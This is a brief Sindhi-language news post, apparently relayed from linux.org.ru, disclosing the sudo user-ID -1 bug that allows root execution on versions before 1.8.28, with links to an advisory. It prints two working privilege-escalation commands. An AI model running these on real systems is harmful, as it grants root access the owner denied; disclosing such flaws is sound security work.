sudo ۾ هڪ بگ توهان کي ڪنهن به قابل عمل فائل کي روٽ جي طور تي عمل ڪرڻ جي اجازت ڏئي ٿو جيڪڏهن /etc/sudoers ان کي ٻين استعمال ڪندڙن طرفان عمل ڪرڻ جي اجازت ڏئي ٿي ۽ روٽ لاءِ منع ٿيل آهي.
غلطي جو استحصال بلڪل سادو آهي:
sudo -u#-1 id -u
يا:
sudo -u#4294967295 id -u
غلطي 1.8.28 کان اڳ sudo جي سڀني نسخن ۾ موجود آهي
تفصيلات:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
جو ذريعو: linux.org.ru